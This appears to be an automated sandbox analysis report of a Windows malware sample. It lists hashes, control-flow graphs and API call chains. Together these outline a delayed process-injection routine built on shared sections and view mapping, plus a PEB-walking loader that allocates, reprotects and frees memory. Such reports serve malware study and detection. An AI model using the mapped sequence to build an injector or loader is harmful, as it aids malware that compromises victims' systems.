                    • Opcode ID: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
                    • Instruction ID: 5192c5fd7ad846daa7d68e837b6c6d3e663b4b5ca2644085206a245cacfb9c55
                    • Opcode Fuzzy Hash: 06fc01ff54c1de9d0546f325fd6eb32fa967447e89cf10e9bb9eeb484df65950
                    • Instruction Fuzzy Hash: C80152B2208205EBDB006AD09D91F6A3364AF01714F308137BA17790F1D67D9A53F71B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 477 4018f4-40192e call 401163 Sleep call 4013ed 484 401930-401938 call 4014e2 477->484 485 40193d-401990 call 401163 477->485 484->485
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
                    • Instruction ID: 6301a06c588b47d17a354cf59e3a00cdfa51c18b5066a88522684ebbc7f3c5b3
                    • Opcode Fuzzy Hash: aba4ed6962655fa9e58d9b243404d4cd8fbb99be38422038cecd155628e1f565
                    • Instruction Fuzzy Hash: 3C0175B1248105EBDB006AE49D91FAE33546F05714F204133FA577A1F1D27D9913E76B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 499 401907-40192e call 401163 Sleep call 4013ed 507 401930-401938 call 4014e2 499->507 508 40193d-401990 call 401163 499->508 507->508
                    APIs
                    • Sleep.KERNELBASE(00001388,000000DE), ref: 00401919
                      • Part of subcall function 004014E2: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                      • Part of subcall function 004014E2: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSectionSleep
                    • String ID:
                    • API String ID: 4152845823-0
                    • Opcode ID: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
                    • Instruction ID: ddfa02207d2976e6176cbc7aeabde5bcf8e04bb4bd45437ba787a0bf3f4ebc64
                    • Opcode Fuzzy Hash: 621ccd25a172018797ce6621ebc33c4937c50a7202d72714c7e14af9fbaf8c42
                    • Instruction Fuzzy Hash: D10171B1208205EBDB006AE4DD91F6A3364AF05714F204137FA577A0F0C27E9A53E72B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0434B466
                    Memory Dump Source
                    • Source File: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Offset: 04344000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4344000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: 991237fe609061ee5b8d2eb8bcfc395a16ea8c3d0947fb36a4df3e3e041b78c6
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 38112B79A00208EFDB01DF98C985E98BBF5AF08350F158094FA489B361D375EA50EF80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .$GetProcAddress.$l
                    • API String ID: 0-2784972518
                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction ID: 6140067ffa0b4a676e81550f86790db8153e368fede1e0cef19aaed83ac02889
                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                    • Instruction Fuzzy Hash: 503139B6900609DFEB10CF99C880BAEBBF5FF48329F15408AD545AB214D771FA45CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSection
                    • String ID: w
                    • API String ID: 3132048701-476252946
                    • Opcode ID: 5307f634e3a506ea2320f5743c53b9c3ec9651771174e14a08c9c248aa8a452e
                    • Instruction ID: 21e26b27f840a71e9c2479f5824e9a5b58214ec678355e1b3ba33bd2b697900d
                    • Opcode Fuzzy Hash: 5307f634e3a506ea2320f5743c53b9c3ec9651771174e14a08c9c248aa8a452e
                    • Instruction Fuzzy Hash: 31216BB1908288D7E7229A75C08029A7B91BF513D4F7900BFD4916B2B3D7798447974B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSection
                    • String ID: w
                    • API String ID: 3132048701-476252946
                    • Opcode ID: 3d164c9caefbd0c79770c83873e083ac9f272dbc2fb0f5ee021208258e87fe5c
                    • Instruction ID: 3ce6a916d8d01e929893c0d83df2441c47a9e6de1688a554765366bcd4a56753
                    • Opcode Fuzzy Hash: 3d164c9caefbd0c79770c83873e083ac9f272dbc2fb0f5ee021208258e87fe5c
                    • Instruction Fuzzy Hash: 25219DA2D09284DBE722AB75C08029A7B90BF513D4B7900FFD0906B2B7E739C457C789
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSection
                    • String ID: w
                    • API String ID: 3132048701-476252946
                    • Opcode ID: 9f8fa575fc4a76ac03b320a7d3feff316ede3eb2f157533e03b1c81068af3e11
                    • Instruction ID: e2385927b4e27c6bf3e150a27e60e2e72ca91b290c02674fa8b867697a20b252
                    • Opcode Fuzzy Hash: 9f8fa575fc4a76ac03b320a7d3feff316ede3eb2f157533e03b1c81068af3e11
                    • Instruction Fuzzy Hash: 07218BA2D04189D7E722AB74C08038ABB91BF523E4F7A00BFD0946B277E7798447C785
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID:
                    • String ID: w
                    • API String ID: 0-476252946
                    • Opcode ID: d9751c7a0d5efc3d13f605be65c5fd372a0dbed2bb38e09722ca5738afb953d9
                    • Instruction ID: 901ca8bb586433f8fc6d7141f8d27aeeb597132328b78f02a134cd28ca5d0fb1
                    • Opcode Fuzzy Hash: d9751c7a0d5efc3d13f605be65c5fd372a0dbed2bb38e09722ca5738afb953d9
                    • Instruction Fuzzy Hash: B6118CE2A042899BE7229B75C08029A7B91FF513E4B7901BFD0905A6B7E779C407C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a74ea88b89c3d8a7194aa168887248808e1108a0b707910c5cd6e0e1350db2e
                    • Instruction ID: 0e9ebbcfba286c6ee41e2bde73d6518a855f9b320133d3884c6a40b0f70cde46
                    • Opcode Fuzzy Hash: 0a74ea88b89c3d8a7194aa168887248808e1108a0b707910c5cd6e0e1350db2e
                    • Instruction Fuzzy Hash: EE21046680D2D29FDB164E205CA62617F78962331279912FFC481EA5D3E22C8B07D329
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Offset: 04344000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4344000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: b92b00161e4360260388b22276b2102d94f222466df2efa2cbe0f237358fb81f
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: EA117C72340100AFE754DE59DC80EE6B3EAEB89325B198165EE14CB312E776F841C760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Offset: 04130000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4130000_rBwTlpgnjc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: e9e973fc7ee48611908425a841861b535a7b7600dd0c75fea6781d432008de7d
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: 0A01A7767006048FDF21CF24C854BEA37E5FB89217F4544F5E50697245E774B9418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.2056551276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                    • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
                    • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                    • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindHandlerForForeignException.LIBCMT ref: 0040B133
                    • ___FrameUnwindToState.LIBCMT ref: 0040B19C
                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: EncodeExceptionFindForeignFrameHandlerPointerStateUnwind
                    • String ID: LEA$MOC$RCC$TEA
                    • API String ID: 1036487854-2731589300
                    • Opcode ID: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
                    • Instruction ID: fde7f3cf3d54f177af3fd344ca719e7cdbfe60c4783f3b80faa380b6aa17e4eb
                    • Opcode Fuzzy Hash: 1a2bd6febaed6d2cf79add096828e36a246bb04c73bc044f33d159c1ebe0c176
                    • Instruction Fuzzy Hash: E651BE32500109AFDF11DF80CC45EAEB766EF84318F1881AEFA1476292C739AD60CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___TypeMatch.LIBCMT ref: 0040B031
                    • IsInExceptionSpec.LIBCMT ref: 0040B0DA
                    • ___FrameUnwindToState.LIBCMT ref: 0040B19C
                    • RtlEncodePointer.NTDLL(00000000), ref: 0040B1D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: EncodeExceptionFrameMatchPointerSpecStateTypeUnwind
                    • String ID: MOC$RCC
                    • API String ID: 2268674365-2084237596
                    • Opcode ID: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
                    • Instruction ID: fe3876bf30caa339d60e068b76d1540c14f00c9adcebcf3be3f80ea161fb876a
                    • Opcode Fuzzy Hash: ab32939c3ea4cad5d0379ab34813940f09444cff58c9fdd57895ec532d556492
                    • Instruction Fuzzy Hash: 2D81AB31900209AFDF11DF94C845EAEBBB6FF48314F1481AAF91477291C739A961CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2056595034.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40b000_rBwTlpgnjc.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 546156d34ab6ee1089efc4ea19fc89f106c9727d11cbe4cec4e4add1c920c602
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 0D013D7700014AFBCF126E94CC418EE3F66FF18354B588426FA6869171D33AC9B1AB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:6.5%
                    Dynamic/Decrypted Code Coverage:18.5%
                    Signature Coverage:0%
                    Total number of Nodes:265
                    Total number of Limit Nodes:10
                    execution_graph 6434 40e400 RtlUnwind 6435 40b001 6436 40b017 ___FrameUnwindToState IsInExceptionSpec ___TypeMatch 6435->6436 6437 40b1d5 RtlEncodePointer 6436->6437 6438 40b13b 6436->6438 6437->6438 6588 40da43 6589 40da51 6588->6589 6590 40da56 6588->6590 6594 40ed03 CreateFileW 6589->6594 6591 40da60 6590->6591 6592 40da67 WriteConsoleW 6590->6592 6592->6591 6594->6590 6644 40d7c7 6645 40d7d3 6644->6645 6648 40d7e4 6645->6648 6652 40d5d2 6645->6652 6650 40d85c 6661 40d899 6650->6661 6654 40d5de ___lock_fhandle 6652->6654 6653 40d62d RtlEnterCriticalSection 6655 40d653 6653->6655 6654->6653 6655->6650 6656 40d8c3 6655->6656 6657 40d8d3 __lseeki64_nolock 6656->6657 6658 40d8ec SetFilePointerEx 6657->6658 6659 40d8db 6657->6659 6658->6659 6660 40d904 GetLastError 6658->6660 6659->6650 6660->6659 6664 40d74d RtlLeaveCriticalSection 6661->6664 6663 40d89f 6663->6648 6664->6663 6320 40c20c 6323 40c21d 6320->6323 6324 40c22f 6323->6324 6331 40e724 6324->6331 6326 40c23b 6327 40c24f 6326->6327 6336 40e5b6 6326->6336 6329 40e724 __forcdecpt_l 8 API calls 6327->6329 6330 40c219 6329->6330 6332 40e730 6331->6332 6333 40e742 6331->6333 6332->6326 6341 40e5e1 6333->6341 6337 40e5c2 6336->6337 6338 40e5d3 6336->6338 6337->6326 6386 40e564 6338->6386 6342 40e5f4 6341->6342 6343 40e600 6342->6343 6345 40e660 6342->6345 6347 40e615 6343->6347 6352 40e10c 6343->6352 6348 40cd77 6345->6348 6347->6326 6349 40cd88 6348->6349 6356 40cb73 6349->6356 6351 40cda9 6351->6347 6353 40e11e 6352->6353 6355 40e12b 6353->6355 6375 40ced3 6353->6375 6355->6347 6358 40cb8c MultiByteToWideChar 6356->6358 6363 40cbf2 6358->6363 6369 40cbeb __freea 6358->6369 6359 40cc51 MultiByteToWideChar 6360 40cc6a 6359->6360 6359->6369 6371 40d47b 6360->6371 6362 40cc7e 6364 40cc94 6362->6364 6368 40ccc0 6362->6368 6362->6369 6363->6359 6363->6369 6365 40d47b __crtLCMapStringA_stat 2 API calls 6364->6365 6364->6369 6365->6369 6366 40d47b __crtLCMapStringA_stat 2 API calls 6367 40cd2b 6366->6367 6367->6369 6370 40cd45 WideCharToMultiByte 6367->6370 6368->6366 6368->6369 6369->6351 6370->6369 6372 40d4a6 __crtLCMapStringA_stat 6371->6372 6373 40d48b LCMapStringEx 6371->6373 6374 40d4bd LCMapStringW 6372->6374 6373->6362 6374->6362 6376 40cee4 6375->6376 6379 40cddb 6376->6379 6378 40ceff 6378->6355 6380 40ce02 MultiByteToWideChar 6379->6380 6381 40cdf5 6379->6381 6382 40ce27 __freea 6380->6382 6383 40ce2e __wctomb_s_l 6380->6383 6381->6380 6382->6378 6383->6382 6384 40ce8c MultiByteToWideChar 6383->6384 6384->6382 6385 40cea6 GetStringTypeW 6384->6385 6385->6382 6387 40e575 6386->6387 6388 40e10c __isctype_l 3 API calls 6387->6388 6389 40e58c 6387->6389 6388->6389 6389->6326 6472 4018ce 6473 4018f2 6472->6473 6474 401911 Sleep 6473->6474 6475 4013ed 7 API calls 6474->6475 6476 40192c 6475->6476 6477 4014e2 7 API calls 6476->6477 6478 40193d 6476->6478 6477->6478 6439 40dc12 6440 40dc1b 6439->6440 6444 40dc26 6439->6444 6441 40dc43 RtlReAllocateHeap 6442 40dc2e 6441->6442 6441->6444 6443 40dca3 GetLastError 6443->6442 6444->6441 6444->6442 6444->6443 6446 40dc8b GetLastError 6444->6446 6446->6442 6639 40c2d3 6641 40c2e6 __controlfp_s 6639->6641 6640 40c2ed 6641->6640 6642 40c2fd RtlEncodePointer 6641->6642 6642->6642 6643 40c317 6642->6643 6266 402e54 6269 402e4a 6266->6269 6267 402ee5 6269->6267 6270 4018c3 6269->6270 6271 4018d1 6270->6271 6272 401911 Sleep 6271->6272 6277 4013ed 6272->6277 6274 40192c 6276 40193d 6274->6276 6289 4014e2 6274->6289 6276->6267 6278 4013ee 6277->6278 6279 40159c NtDuplicateObject 6278->6279 6280 40147f 6278->6280 6279->6280 6281 4015b9 NtCreateSection 6279->6281 6280->6274 6282 401639 NtCreateSection 6281->6282 6283 4015df NtMapViewOfSection 6281->6283 6282->6280 6285 401665 6282->6285 6283->6282 6284 401602 NtMapViewOfSection 6283->6284 6284->6282 6288 401620 6284->6288 6285->6280 6286 40166f NtMapViewOfSection 6285->6286 6286->6280 6287 401696 NtMapViewOfSection 6286->6287 6287->6280 6288->6282 6290 4014f3 6289->6290 6291 40159c NtDuplicateObject 6290->6291 6299 4016b8 6290->6299 6292 4015b9 NtCreateSection 6291->6292 6291->6299 6293 401639 NtCreateSection 6292->6293 6294 4015df NtMapViewOfSection 6292->6294 6296 401665 6293->6296 6293->6299 6294->6293 6295 401602 NtMapViewOfSection 6294->6295 6295->6293 6297 401620 6295->6297 6298 40166f NtMapViewOfSection 6296->6298 6296->6299 6297->6293 6298->6299 6300 401696 NtMapViewOfSection 6298->6300 6299->6276 6300->6299 6532 40b114 6533 40b11c 6532->6533 6536 40b138 6532->6536 6534 40b121 6533->6534 6537 40b154 ___FrameUnwindToState 6533->6537 6540 40b1ad 6534->6540 6538 40b1d5 RtlEncodePointer 6537->6538 6539 40b1e4 6537->6539 6538->6539 6541 40b1c2 6540->6541 6543 40b1e4 6540->6543 6542 40b1d5 RtlEncodePointer 6541->6542 6541->6543 6542->6543 6543->6536 6408 41a0001 6409 41a0005 6408->6409 6414 41a092b GetPEB 6409->6414 6411 41a0030 6416 41a003c 6411->6416 6415 41a0972 6414->6415 6415->6411 6417 41a0049 6416->6417 6418 41a0e0f 2 API calls 6417->6418 6419 41a0223 6418->6419 6420 41a0d90 GetPEB 6419->6420 6421 41a0238 VirtualAlloc 6420->6421 6422 41a0265 6421->6422 6423 41a02ce VirtualProtect 6422->6423 6425 41a030b 6423->6425 6424 41a0439 VirtualFree 6427 41a04be LoadLibraryA 6424->6427 6425->6424 6428 41a08c7 6427->6428 6595 40de5b 6598 40dd37 6595->6598 6597 40de71 6599 40dd49 6598->6599 6600 40ddf9 WideCharToMultiByte 6599->6600 6602 40dd4d __wctomb_s_l 6599->6602 6601 40de29 GetLastError 6600->6601 6600->6602 6601->6602 6602->6597 6603 40d21d 6604 40d247 6603->6604 6605 40d310 IsDebuggerPresent 6604->6605 6606 40d260 LoadLibraryExW 6604->6606 6609 40d335 6605->6609 6610 40d31a 6605->6610 6607 40d277 GetLastError 6606->6607 6608 40d29d GetProcAddress 6606->6608 6611 40d286 LoadLibraryExW 6607->6611 6617 40d328 6607->6617 6613 40d2b1 GetProcAddress 6608->6613 6608->6617 6614 40d33a RtlDecodePointer 6609->6614 6609->6617 6612 40d321 OutputDebugStringW 6610->6612 6610->6617 6611->6608 6611->6617 6612->6617 6616 40d2c8 GetProcAddress 6613->6616 6614->6617 6618 40d2dc GetProcAddress 6616->6618 6619 40d2f0 6618->6619 6620 40d2f9 GetProcAddress 6619->6620 6621 40d308 6619->6621 6620->6621 6621->6605 6429 41a0005 6430 41a092b GetPEB 6429->6430 6431 41a0030 6430->6431 6432 41a003c 7 API calls 6431->6432 6433 41a0038 6432->6433 6580 402da5 6581 402da8 6580->6581 6582 4018c3 15 API calls 6581->6582 6583 402ee5 6581->6583 6582->6583 6301 41a003c 6302 41a0049 6301->6302 6314 41a0e0f SetErrorMode SetErrorMode 6302->6314 6307 41a0265 6308 41a02ce VirtualProtect 6307->6308 6310 41a030b 6308->6310 6309 41a0439 VirtualFree 6312 41a04be LoadLibraryA 6309->6312 6310->6309 6313 41a08c7 6312->6313 6315 41a0223 6314->6315 6316 41a0d90 6315->6316 6317 41a0dad 6316->6317 6318 41a0dbb GetPEB 6317->6318 6319 41a0238 VirtualAlloc 6317->6319 6318->6319 6319->6307 6626 40da2b 6629 40d936 6626->6629 6630 40d951 6629->6630 6631 40d945 6629->6631 6631->6630 6632 40d9e5 MultiByteToWideChar 6631->6632 6633 40d9a5 6631->6633 6632->6630 6633->6630 6634 40d9b3 MultiByteToWideChar 6633->6634 6634->6630 6665 4013ec 6666 4013ee 6665->6666 6667 40159c NtDuplicateObject 6666->6667 6675 40147f 6666->6675 6668 4015b9 NtCreateSection 6667->6668 6667->6675 6669 401639 NtCreateSection 6668->6669 6670 4015df NtMapViewOfSection 6668->6670 6672 401665 6669->6672 6669->6675 6670->6669 6671 401602 NtMapViewOfSection 6670->6671 6671->6669 6673 401620 6671->6673 6674 40166f NtMapViewOfSection 6672->6674 6672->6675 6673->6669 6674->6675 6676 401696 NtMapViewOfSection 6674->6676 6676->6675 6479 4014ed 6480 4014f2 6479->6480 6481 40159c NtDuplicateObject 6480->6481 6490 4016b8 6480->6490 6482 4015b9 NtCreateSection 6481->6482 6481->6490 6483 401639 NtCreateSection 6482->6483 6484 4015df NtMapViewOfSection 6482->6484 6486 401665 6483->6486 6483->6490 6484->6483 6485 401602 NtMapViewOfSection 6484->6485 6485->6483 6487 401620 6485->6487 6488 40166f NtMapViewOfSection 6486->6488 6486->6490 6487->6483 6489 401696 NtMapViewOfSection 6488->6489 6488->6490 6489->6490 6498 40ecf1 6499 40ed02 6498->6499 6500 40ecf6 6498->6500 6500->6499 6501 40ecfb CloseHandle 6500->6501 6501->6499 6568 40d535 6569 40d541 6568->6569 6570 40d5b2 __fcloseall 6569->6570 6571 40d586 RtlDeleteCriticalSection 6569->6571 6571->6569 6509 40dcbd 6512 40dcc8 6509->6512 6510 40dcf3 RtlAllocateHeap 6511 40dcd4 6510->6511 6510->6512 6512->6510 6512->6511 6390 406b078 6393 406b086 6390->6393 6394 406b095 6393->6394 6397 406b826 6394->6397 6398 406b841 6397->6398 6399 406b84a CreateToolhelp32Snapshot 6398->6399 6400 406b866 Module32First 6398->6400 6399->6398 6399->6400 6401 406b875 6400->6401 6402 406b085 6400->6402 6404 406b4e5 6401->6404 6405 406b510 6404->6405 6406 406b521 VirtualAlloc 6405->6406 6407 406b559 6405->6407 6406->6407 6407->6407

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 4013ed 1 4013ee 0->1 2 4013f0-4013f6 1->2 3 40140c 2->3 4 4013fd-40142e 2->4 3->4 10 401431-401451 call 401163 4->10 11 401425-40142a 4->11 14 401453-401462 10->14 15 401478-40147b 10->15 11->10 14->2 17 401464 14->17 16 40147d 15->16 18 401432-401451 16->18 19 40147f-4014df 16->19 17->1 20 401466-40146d 17->20 18->14 18->15 21 4014e6-4014eb 20->21 22 40146f-40147b 20->22 26 401502 21->26 27 4014f3-401546 call 401163 21->27 22->16 26->27 37 401548 27->37 38 40154b-401550 27->38 37->38 40 401866-40186e 38->40 41 401556-401567 38->41 40->38 46 401873-401889 40->46 44 401864 41->44 45 40156d-401596 41->45 44->46 45->44 54 40159c-4015b3 NtDuplicateObject 45->54 48 40187a-401885 46->48 49 40188c-4018c0 call 401163 46->49 48->49 54->44 57 4015b9-4015dd NtCreateSection 54->57 58 401639-40165f NtCreateSection 57->58 59 4015df-401600 NtMapViewOfSection 57->59 58->44 63 401665-401669 58->63 59->58 61 401602-40161e NtMapViewOfSection 59->61 61->58 64 401620-401636 61->64 63->44 66 40166f-401690 NtMapViewOfSection 63->66 64->58 66->44 68 401696-4016b2 NtMapViewOfSection 66->68 68->44 70 4016b8 call 4016bd 68->70
                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015AB
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2296771573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_ivfjsrs.jbxd
                    Similarity
                    • API ID: CreateDuplicateObjectSection
                    • String ID: w
                    • API String ID: 3132048701-476252946
                    • Opcode ID: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
                    • Instruction ID: d66d783c96bdfa6dca3d1fe6600e499103a6ed67321a36542f9bdd634b40576e
                    • Opcode Fuzzy Hash: 300c2ecdd27e888ad78f13685a5e317154d6974f2db9774834ff63eb7b9d584a
                    • Instruction Fuzzy Hash: A0A11571904204EBEB209FA5CC44FAB7BB8FF81740F24413AF912BA2E1D7749906CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 157 4014e2-401546 call 401163 169 401548 157->169 170 40154b-401550 157->170 169->170 172 401866-40186e 170->172 173 401556-401567 170->173 172->170 178 401873-401889 172->178 176 401864 173->176 177 40156d-401596 173->177 176->178 177->176 186 40159c-4015b3 NtDuplicateObject 177->186 180 40187a-401885 178->180 181 40188c-4018c0 call 401163 178->181 180->181 186->176 189 4015b9-4015dd NtCreateSection 186->189 190 401639-40165f NtCreateSection 189->190 191 4015df-401600 NtMapViewOfSection 189->191 190->176 195 401665-401669 190->195 191->190 193 401602-40161e NtMapViewOfSection 191->193 193->190 196 401620-401636 193->196 195->176 198 40166f-401690 NtMapViewOfSection 195->198 196->190 198->176 200 401696-4016b2 NtMapViewOfSection 198->200 200->176 202 4016b8 call 4016bd 200->202
                    APIs
